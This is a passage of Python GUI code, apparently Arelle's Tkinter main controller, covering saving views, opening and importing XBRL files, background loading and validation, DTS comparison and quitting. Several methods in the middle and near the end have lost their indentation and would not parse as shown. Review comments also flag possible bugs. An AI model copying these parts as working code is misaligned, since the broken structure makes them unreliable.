                            # test harness may supply the target path directly
                            for pluginMenuExtender in pluginClassMethods("DevTesting.GetFilePath"):
                                filename = pluginMenuExtender(self, modelXbrl)
                        if filename is None:
                            filename = self.uiFileDialog("save",
                                    title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
                                    initialdir=initialdir,
                                    filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
                                    defaultextension=".html",
                                    initialfile=initialfile)
                        # an instance extension means "save the instance", not the rendering
                        if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
                            view.saveInstance(filename)
                            return True
                    if not filename:
                        return False
                    try:
                        view = ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
                        modelXbrl.guiViews.tableView = view
                    except (IOError, EnvironmentError) as err:
                        tkinter.messagebox.showwarning(_("arelle - Error"),
                                        _("Failed to save {0}:\n{1}").format(
                                            filename, err),
                                        parent=self.parent)
                    return True
                elif fileType == "xbrl":
                    return self.uiFileDialog("save",
                            title=_("arelle - Save Instance"),
                            initialdir=initialdir,
                            filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
                            defaultextension=".xbrl")
            elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
                # testcase results are exported as CSV
                filename = self.uiFileDialog("save",
                        title=_("arelle - Save Test Results"),
                        initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
                        filetypes=[(_("CSV file"), "*.csv")],
                        defaultextension=".csv")
                if not filename:
                    return False
                try:
                    ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
                except (IOError, EnvironmentError) as err:
                    tkinter.messagebox.showwarning(_("arelle - Error"),
                                    _("Failed to save {0}:\n{1}").format(
                                        filename, err),
                                    parent=self.parent)
                return True
            elif isinstance(view, ViewWinTree.ViewTree):
                filename = self.uiFileDialog("save",
                        title=_("arelle - Save {0}").format(view.tabTitle),
                        initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
                        filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
                        defaultextension=".csv")
                if not filename:
                    return False
                try:
                    # pick the file-view exporter matching the tree view's subtype
                    if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
                        ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
                    elif isinstance(view, ViewWinConcepts.ViewConcepts):
                        ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
                    else:
                        ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
                except (IOError, EnvironmentError) as err:
                    tkinter.messagebox.showwarning(_("arelle - Error"),
                                    _("Failed to save {0}:\n{1}").format(
                                        filename, err),
                                    parent=self.parent)
                return True
            elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
                filename = self.uiFileDialog("save",
                        title=_("arelle - Save Formula Result Instance Document"),
                        initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
                        filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
                        defaultextension=".xml")
                if not filename:
                    return False
                try:
                    from arelle import XmlUtil
                    with open(filename, "w") as fh:
                        XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
                    self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
                except (IOError, EnvironmentError) as err:
                    tkinter.messagebox.showwarning(_("arelle - Error"),
                                    _("Failed to save {0}:\n{1}").format(
                                        self.filename, err),
                                    parent=self.parent)
                return True
        # no view selected, or selected view has nothing savable
        tkinter.messagebox.showwarning(_("arelle - Save what?"),
                    _("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
                    parent=self.parent)
        # legacy pickle-based save kept for reference (dead code inside a string)
        '''
        if self.filename is None:
            filename = self.uiFileDialog("save",
                    title=_("arelle - Save File"),
                    initialdir=".",
                    filetypes=[(_("Xbrl file"), "*.x*")],
                    defaultextension=".xbrl")
            if not filename:
                return False
            self.filename = filename
            if not self.filename.endswith(".xbrl"):
                self.filename += ".xbrl"
        try:
            with open(self.filename, "wb") as fh:
                pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
            self.dirty = False
            self.uiShowStatus(_("Saved {0} items to {1}").format(
                                len(self.data),
                                self.filename), clearAfter=5000)
            self.parent.title(_("arelle - {0}").format(
                                os.path.basename(self.filename)))
        except (EnvironmentError, pickle.PickleError) as err:
            tkinter.messagebox.showwarning(_("arelle - Error"),
                            _("Failed to save {0}:\n{1}").format(
                                self.filename, err),
                            parent=self.parent)
        return True;
        '''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
    def saveDTSpackage(self):
        """Save DTS packages for all loaded DTSes via the model manager."""
        self.modelManager.saveDTSpackage(allDTSes=True)
    def fileOpen(self, *ignore):
        """Prompt for a local XBRL file and open it.

        Refuses IE browser-cache paths (those must use "Open web...") and
        normalizes path separators on Windows before delegating to fileOpenFile.
        """
        if not self.okayToContinue():
            return
        filename = self.uiFileDialog("open",
                                     title=_("arelle - Open file"),
                                     initialdir=self.config.setdefault("fileOpenDir","."),
                                     filetypes=[(_("XBRL files"), "*.*")],
                                     defaultextension=".xbrl")
        if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
            tkinter.messagebox.showerror(_("Loading web-accessed files"),
                _('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
            return
        if os.sep == "\\":
            filename = filename.replace("/", "\\")
        self.fileOpenFile(filename)
    def importFileOpen(self, *ignore):
        """Prompt for a local file and import it into the currently open DTS.

        Requires a DTS (schema/linkbase/instance/inline XBRL) to be open;
        otherwise shows a warning and returns False.
        """
        if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
             ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
            tkinter.messagebox.showwarning(_("arelle - Warning"),
                            _("Import requires an opened DTS"), parent=self.parent)
            return False
        filename = self.uiFileDialog("open",
                                     title=_("arelle - Import file into opened DTS"),
                                     initialdir=self.config.setdefault("importOpenDir","."),
                                     filetypes=[(_("XBRL files"), "*.*")],
                                     defaultextension=".xml")
        if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
            tkinter.messagebox.showerror(_("Loading web-accessed files"),
                _('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
            return
        if os.sep == "\\":
            filename = filename.replace("/", "\\")
        self.fileOpenFile(filename, importToDTS=True)
    def updateFileHistory(self, url, importToDTS):
        """Move *url* to the front of the file (or import) history list and persist it.

        Existing occurrences of url are removed first, then the list is
        truncated and url inserted at position 0; the menu is rebuilt and the
        config saved.
        NOTE(review): after the insert the list can hold fileHistorySize + 1
        entries - confirm whether the truncation should use fileHistorySize - 1.
        """
        key = "importHistory" if importToDTS else "fileHistory"
        fileHistory = self.config.setdefault(key, [])
        while fileHistory.count(url) > 0:
            fileHistory.remove(url)
        if len(fileHistory) > self.fileHistorySize:
            fileHistory[self.fileHistorySize:] = []
        fileHistory.insert(0, url)
        self.config[key] = fileHistory
        self.loadFileMenuHistory()
        self.saveConfig()
    def fileOpenFile(self, filename, importToDTS=False, selectTopView=False, reportName=None):
        """Open *filename* (possibly inside an archive) and load it on a background thread.

        Archives without a selected entry pop the archive-entry chooser first.
        Updates the open/import directory config and the file history, then
        loads directly in test mode or on a daemon thread otherwise.
        """
        if filename:
            filesource = None
            # check for archive files
            filesource = openFileSource(filename, self,
                                        checkIfXmlIsEis=self.modelManager.disclosureSystem and
                                        self.modelManager.disclosureSystem.EFM)
            filesource.reportName = reportName
            if filesource.isArchive and not filesource.selection: # or filesource.isRss:
                from arelle import DialogOpenArchive
                filename = DialogOpenArchive.askArchiveFile(self, filesource)
            if filename:
                if importToDTS:
                    if not isHttpUrl(filename):
                        self.config["importOpenDir"] = os.path.dirname(filename)
                else:
                    if not isHttpUrl(filename):
                        self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
                self.updateFileHistory(filename, importToDTS)
                if self.testMode:
                    self.backgroundLoadXbrl(filesource,importToDTS,selectTopView)
                else:
                    thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
                    thread.daemon = True
                    thread.start()
    def webOpen(self, *ignore):
        """Prompt for a URL (with SEC/RSS shortcuts) and load it on a background thread."""
        if not self.okayToContinue():
            return
        url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
        if url:
            self.updateFileHistory(url, False)
            filesource = openFileSource(url,self)
            if filesource.isArchive and not filesource.selection: # or filesource.isRss:
                from arelle import DialogOpenArchive
                url = DialogOpenArchive.askArchiveFile(self, filesource)
                self.updateFileHistory(url, False)
            thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
            thread.daemon = True
            thread.start()
    def importWebOpen(self, *ignore):
        """Prompt for a URL and import it into the currently open DTS.

        Requires a DTS (schema/linkbase/instance/inline XBRL) to be open;
        otherwise shows a warning and returns False.
        """
        if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
             ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
            tkinter.messagebox.showwarning(_("arelle - Warning"),
                            _("Import requires an opened DTS"), parent=self.parent)
            return False
        url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
        if url:
            self.fileOpenFile(url, importToDTS=True)
    def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
        """Load *filesource* (or import it into the open DTS) on a worker thread.

        On success, queues showLoadedXbrl onto the UI thread (or calls it
        directly in test mode); on failure, logs the exception and shows a
        status message.  Load time is recorded as a profile statistic.
        """
        startedAt = time.time()
        try:
            if importToDTS:
                action = _("imported")
                profileStat = "import"
                modelXbrl = self.modelManager.modelXbrl
                if modelXbrl:
                    ModelDocument.load(modelXbrl, filesource.url)
                    modelXbrl.relationshipSets.clear() # relationships have to be re-cached
            else:
                action = _("loaded")
                profileStat = "load"
                modelXbrl = self.modelManager.load(filesource, _("views loading"))
        except ModelDocument.LoadingException:
            self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
            return
        except Exception as err:
            msg = _("Exception loading {0}: {1}, at {2}").format(
                     filesource.url,
                     err,
                     traceback.format_tb(sys.exc_info()[2]))
            # not sure if message box can be shown from background thread
            # tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
            self.addToLog(msg);
            self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
            return
        if modelXbrl and modelXbrl.modelDocument:
            if filesource.reportName is None:
                entryPoint = modelXbrl.getSingleSchemaRef()
                if entryPoint is not None:
                    for pluginMethod in pluginClassMethods("GetReportNameFromEntryPoint"):
                        reportName = pluginMethod(self, entryPoint)
                        if reportName is not None:
                            modelXbrl.reportName = reportName
                            break
                    # try the hard way
                    # NOTE(review): return value is discarded and this runs even when a
                    # plugin already set reportName above - confirm side effects intended
                    self.modelManager.getReportNameFromSchemaRef(entryPoint)
            else:
                modelXbrl.reportName = filesource.reportName
            statTime = time.time() - startedAt
            modelXbrl.profileStat(profileStat, statTime)
            self.addToLog(format_string(self.modelManager.locale,
                                        _("%s in %.2f secs %s"),
                                        (action, statTime, filesource.url)))
            if modelXbrl.hasTableRendering:
                self.showStatus(_("Initializing table rendering"))
                RenderingEvaluator.init(modelXbrl)
            self.showStatus(_("{0}, preparing views").format(action))
            if self.testMode:
                self.showLoadedXbrl(modelXbrl, importToDTS, selectTopView)
            else:
                self.waitForUiThreadQueue() # force status update
                self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
        else:
            self.addToLog(format_string(self.modelManager.locale,
                                        _("not successfully %s in %.2f secs %s"),
                                        (action, time.time() - startedAt, filesource.url)))
    def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
        """Build the GUI view panes for a newly loaded modelXbrl (runs on the UI thread).

        attach=True closes the model's existing views first (reload case).
        The panes created depend on the document type (testcase, versioning
        report, RSS feed, or instance/DTS); plugins may veto individual panes.
        When selectTopView is set, the first created top-right view is selected.
        Any exception during view construction is reported in a message box,
        with currentAction tracking which step failed.
        """
        startedAt = time.time()
        currentAction = "setting title"
        topView = None
        self.currentView = None
        # plugin hooks may disable individual pane groups
        displayTaxonomyTabs = True
        for displayTaxonomyTabsMethod in pluginClassMethods("CntlrWinMain.Tabs.DisplayTaxonomyTabs"):
            displayTaxonomyTabs = displayTaxonomyTabs and displayTaxonomyTabsMethod() # runs in GUI thread
        viewDTS = True
        for viewDTSMethod in pluginClassMethods("viewDTS"):
            viewDTS = viewDTS and viewDTSMethod()
        viewProperties = True
        for viewPropertiesMethod in pluginClassMethods("viewProperties"):
            viewProperties = viewProperties and viewPropertiesMethod()
        viewConcepts = True
        for viewConceptsMethod in pluginClassMethods("viewConcepts"):
            viewConcepts = viewConcepts and viewConceptsMethod()
        try:
            if attach:
                modelXbrl.closeViews()
            self.showTitle(modelXbrl=modelXbrl)
            self.setValidateTooltipText()
            if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
                currentAction = "tree view of tests"
                ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
                topView = modelXbrl.views[-1]
            elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
                currentAction = "view of versioning report"
                ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
                from arelle.ViewWinDiffs import ViewWinDiffs
                ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
            elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
                currentAction = "view of RSS feed"
                ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
                topView = modelXbrl.views[-1]
            else:
                if modelXbrl.hasTableIndexing:
                    currentAction = "table index view"
                    view = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
                                                                      treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
                    modelXbrl.guiViews.tableIndexView = view
                elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
                    currentAction = "table index view"
                    firstTableLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl)
                    if firstTableLinkroleURI:
                        view = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
                                                                          treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
                        modelXbrl.guiViews.tableIndexView = view
                '''
                elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
                      not modelXbrl.hasTableRendering):
                    currentAction = "facttable ELRs view"
                    ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
                                                               treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
                '''
                currentAction = "tree view of tests"
                if viewDTS:
                    ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
                if viewConcepts:
                    currentAction = "view of concepts"
                    ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
                if modelXbrl.hasTableRendering:  # show rendering grid even without any facts
                    view = ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
                    if topView is None: topView = modelXbrl.views[-1]
                    modelXbrl.guiViews.tableView = view
                if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
                    currentAction = "table view of facts"
                    if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
                        # NOTE(review): firstTableLinkroleURI is only bound in the elif branch
                        # above - confirm it cannot be referenced unbound on this path
                        modelXbrl.guiViews.factTableView = ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI)
                        if topView is None: topView = modelXbrl.views[-1]
                    if displayTaxonomyTabs:
                        currentAction = "tree/list of facts"
                        ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
                        if topView is None: topView = modelXbrl.views[-1]
                if displayTaxonomyTabs:
                    if modelXbrl.hasFormulae:
                        currentAction = "formulae view"
                        ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
                        if topView is None: topView = modelXbrl.views[-1]
                    currentAction = "presentation linkbase view"
                    ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
                    if topView is None: topView = modelXbrl.views[-1]
                    currentAction = "calculation linkbase view"
                    ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
                    currentAction = "dimensions relationships view"
                    ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
                    if modelXbrl.hasTableRendering:
                        currentAction = "rendering view"
                        ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
                    for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
                        if XbrlConst.arcroleGroupDetect in arcroles:
                            currentAction = name + " view"
                            ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
            if viewProperties:
                currentAction = "property grid"
                modelXbrl.guiViews.propertiesView = ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
            currentAction = "log view creation time"
            viewTime = time.time() - startedAt
            modelXbrl.profileStat("view", viewTime)
            self.addToLog(format_string(self.modelManager.locale,
                                        _("views %.2f secs"), viewTime))
            if selectTopView and topView:
                topView.select()
            self.currentView = topView
            if self.filename is None:
                view = getattr(self, "currentView", None)
                if view is not None:
                    modelXbrl = None
                    try:
                        modelXbrl = view.modelXbrl
                    except AttributeError:
                        pass
                    if modelXbrl is not None:
                        try:
                            ff = modelXbrl.modelDocument.filepath
                            if ff.endswith('.xsd'):
                                saved = False
                                for pluginXbrlMethod in pluginClassMethods("CntlrWinMain.Rendering.SaveNewFileFromGUI"):
                                    stopPlugin, saved = pluginXbrlMethod(self)
                                    if stopPlugin:
                                        break;
                                if not saved:
                                    self.modelManager.close()
                                    self.showTitle(filename=None)
                                    self.currentView = None
                        except AttributeError:
                            pass
            for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
                xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
        except Exception as err:
            msg = _("Exception preparing {0}: {1}, at {2}").format(
                     currentAction,
                     err,
                     traceback.format_tb(sys.exc_info()[2]))
            tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
            self.addToLog(msg);
        self.showStatus(_("Ready..."), 2000)
    def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
        """Close the prior formula output instance and show the new one (UI thread).

        The prior instance must be closed here because it may own UI views.
        Exceptions are reported in a message box and logged.
        """
        currentAction = "closing prior formula output instance"
        try:
            if priorOutputInstance: # if has UI must close on UI thread, not background thread
                priorOutputInstance.close()
            currentAction = "showing resulting formula output instance"
            if currentOutputInstance:
                ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
        except Exception as err:
            msg = _("Exception {0}: {1}, at {2}").format(
                     currentAction,
                     err,
                     traceback.format_tb(sys.exc_info()[2]))
            tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
            self.addToLog(msg);
        self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
    def fileClose(self, *ignore):
        """Close the current modelXbrl (after dirty-state confirmation) and reset the UI.

        In test mode, DevTesting plugin hooks are invoked before and after the close.
        """
        if not self.okayToContinue():
            return
        modelXbrl = self.getModelXbrl()
        if modelXbrl is None:
            modelXbrl = self.modelManager.modelXbrl
        if modelXbrl is None:
            return
        filename = modelXbrl.uri
        if self.testMode:
            for pluginMenuExtender in pluginClassMethods("DevTesting.FileCloseStart"):
                pluginMenuExtender(self, modelXbrl)
        self.modelManager.close(modelXbrl=modelXbrl)
        self.showTitle(filename=None)
        self.setValidateTooltipText()
        self.currentView = None
        modelXbrl = None
        if self.testMode:
            for pluginMenuExtender in pluginClassMethods("DevTesting.FileCloseEnd"):
                pluginMenuExtender(self, filename)
    def validate(self):
        """Validate the current model on a background thread (directly in test mode).

        Warns if disclosure-system checking is requested but no system is
        selected; runs Testcases.Start plugin hooks for testcase documents.
        """
        modelXbrl = self.getModelXbrl()
        if modelXbrl:
            if (modelXbrl.modelManager.validateDisclosureSystem and
                not modelXbrl.modelManager.disclosureSystem.selection):
                tkinter.messagebox.showwarning(_("arelle - Warning"),
                                _("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
                                parent=self.parent)
            else:
                if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
                    for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
                        pluginXbrlMethod(self, None, modelXbrl)
                if self.testMode:
                    self.backgroundValidate()
                else:
                    thread = threading.Thread(target=lambda: self.backgroundValidate())
                    thread.daemon = True
                    thread.start()
    def backgroundValidate(self):
        """Run validation on a worker thread and queue result display onto the UI thread.

        formulaOutputInstance is detached first so the background thread does
        not close a UI-owned instance; the prior/new instances are handed to
        showFormulaOutputInstance afterwards.
        """
        startedAt = time.time()
        modelXbrl = self.getModelXbrl()
        priorOutputInstance = modelXbrl.formulaOutputInstance
        modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
        self.modelManager.validate(modelXbrl=modelXbrl)
        self.addToLog(format_string(self.modelManager.locale,
                                    _("validated in %.2f secs"),
                                    time.time() - startedAt), file=modelXbrl.modelDocument.filepath)
        if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
            if self.testMode:
                self.showFormulaOutputInstance(priorOutputInstance, modelXbrl.formulaOutputInstance)
            else:
                self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
        if self.testMode:
            self.logSelect()
        else:
            self.uiThreadQueue.put((self.logSelect, []))
    def compareDTSes(self):
        """Compare the two loaded DTSes, writing a versioning report on a background thread.

        Requires exactly two loaded DTSes; prompts for the report file name and
        remembers its directory in config.
        """
        countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
        if countLoadedDTSes != 2:
            tkinter.messagebox.showwarning(_("arelle - Warning"),
                            _("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
                            parent=self.parent)
            return False
        versReportFile = self.uiFileDialog("save",
                                           title=_("arelle - Save Versioning Report File"),
                                           initialdir=self.config.setdefault("versioningReportDir","."),
                                           filetypes=[(_("Versioning report file"), "*.xml")],
                                           defaultextension=".xml")
        if not versReportFile:
            return False
        self.config["versioningReportDir"] = os.path.dirname(versReportFile)
        self.saveConfig()
        thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
        thread.daemon = True
        thread.start()
    def backgroundCompareDTSes(self, versReportFile):
        """Worker-thread body of compareDTSes: run the comparison, then queue result display."""
        startedAt = time.time()
        modelVersReport = self.modelManager.compareDTSes(versReportFile)
        if modelVersReport and modelVersReport.modelDocument:
            self.addToLog(format_string(self.modelManager.locale,
                                        _("compared in %.2f secs"),
                                        time.time() - startedAt))
            self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
    def showComparedDTSes(self, modelVersReport):
        """Show the versioning report views, closing the two compared DTS displays first (UI thread)."""
        # close prior DTS displays
        modelVersReport.modelDocument.fromDTS.closeViews()
        modelVersReport.modelDocument.toDTS.closeViews()
        self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.showTitle(filename=self.filename)
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
    def quit(self, event=None, restartAfterQuit=False):
        """Shut the application down (optionally flagging a restart).

        Persists window geometry/state and splitter sizes to config, closes the
        model manager and logging, destroys the Tk root, and closes the log file.
        """
        if self.okayToContinue():
            self.modelManager.close()
            logging.shutdown()
            global restartMain
            restartMain = restartAfterQuit
            state = self.parent.state()
            if state == "normal":
                self.config["windowGeometry"] = self.parent.geometry()
            if state in ("normal", "zoomed"):
                self.config["windowState"] = state
            if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
            elif self.isMac: adjustW = 54; adjustH = 39
            else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
            self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
                                                self.tabWinTopLeft.winfo_height() - adjustH)
            super(CntlrWinMain, self).close(saveConfig=True)
            # NOTE(review): unbind_all(()) with an empty sequence looks like a no-op - confirm intent
            self.parent.unbind_all(())
            self.parent.destroy()
            if self.logFile:
                self.logFile.close()
                self.logFile = None
    def restart(self, event=None):
        """Quit and flag the outer main() loop to start a fresh instance."""
        self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
    def confirmClearWebCache(self):
        """Ask for confirmation, then clear the internet cache on a background thread."""
        if tkinter.messagebox.askyesno(
                    _("arelle - Clear Internet Cache"),
                    _("Are you sure you want to clear the internet cache?"),
                    parent=self.parent):
            def backgroundClearCache():
                self.showStatus(_("Clearing internet cache"))
                self.webCache.clear()
                self.showStatus(_("Internet cache cleared"), 5000)
            thread = threading.Thread(target=lambda: backgroundClearCache())
            thread.daemon = True
            thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
    def setupProxy(self):
        """Show the proxy-settings dialog; on OK, apply to the web cache and persist to config."""
        from arelle.DialogUserPassword import askProxy
        proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
        if proxySettings:
            self.webCache.resetProxies(proxySettings)
            self.config["proxySettings"] = proxySettings
            self.saveConfig()
    def setValidateDisclosureSystem(self, *args):
        """Persist the disclosure-system checkbox; prompt for a system if none is selected yet."""
        self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
        self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
        self.saveConfig()
        if self.modelManager.validateDisclosureSystem:
            if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
                self.selectDisclosureSystem()
        self.setValidateTooltipText()
    def selectDisclosureSystem(self, *args):
        """Show the disclosure-system chooser, persist the selection, and refresh the tooltip."""
        from arelle import DialogOpenArchive
        self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
        self.saveConfig()
        self.setValidateTooltipText()
    def formulaParametersDialog(self, *args):
        """Show the formula-parameters dialog, then refresh the validate tooltip."""
        DialogFormulaParameters.getParameters(self)
        self.setValidateTooltipText()
    def activeFormulaDialog(self, *args):
        """Show the active-formula selection dialog, then refresh the validate tooltip."""
        DialogActiveFormula.getActiveFormula(self)
        self.setValidateTooltipText()
    def rssWatchOptionsDialog(self, *args):
        """Show the RSS-watch options dialog."""
        from arelle import DialogRssWatch
        DialogRssWatch.getOptions(self)
    # find or open rssWatch view
    def rssWatchControl(self, start=False, stop=False, close=False):
        """Start or stop watching the configured RSS feed.

        Requires feedSourceUri in rssWatchOptions; loads (or reuses) the RSS
        feed model and starts/stops its watcher.
        NOTE(review): the close parameter is currently unused - confirm whether
        a close branch was intended.
        """
        from arelle.ModelDocument import Type
        from arelle import WatchRss
        if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
            tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
